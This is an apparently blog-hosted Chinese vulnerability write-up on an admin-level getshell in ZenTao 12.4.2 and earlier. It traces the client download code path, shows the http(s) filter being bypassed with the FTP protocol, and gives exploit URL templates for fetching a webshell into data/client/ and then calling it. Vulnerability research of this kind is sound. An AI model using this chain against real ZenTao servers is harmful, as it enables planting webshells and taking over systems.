禅道≤12.4.2后台管理员权限Getshell

漏洞分析

module/client/control.php:86
截屏2020-10-21 下午2.44.10.png参数直接传入 module,跟进 downloadZipPackage 函数,全局搜索发现有两个downloadZipPackage函数:

module/client/ext/model/xuanxuan.php:10
截屏2020-10-22 上午12.15.53.pnglink 参数进行过滤,如果正则匹配到 http[s]:// 则返回false,可以使用FTP协议绕过。

module/client/model.php:240
截屏2020-10-21 下午2.47.54.pngbase64 解密 link 参数后将下载文件至 data/client/ 拼接 version 参数的目录,无任何过滤。
调用路径:control -> ext module -> module


漏洞利用

Exploit:

http://127.0.0.1/zentao/client-download-1-(base64 encode webshell download link)-1.html
http://127.0.0.1/zentao/data/client/1/(download link filename)

复现:

QQ20201022-001155@2x.png使用FTP协议下载文件,绕过module/client/ext/model/xuanxuan.php:10函数的HTTP协议过滤。
截屏2020-10-22 上午12.12.50.png

发表评论

电子邮件地址不会被公开。 必填项已用*标注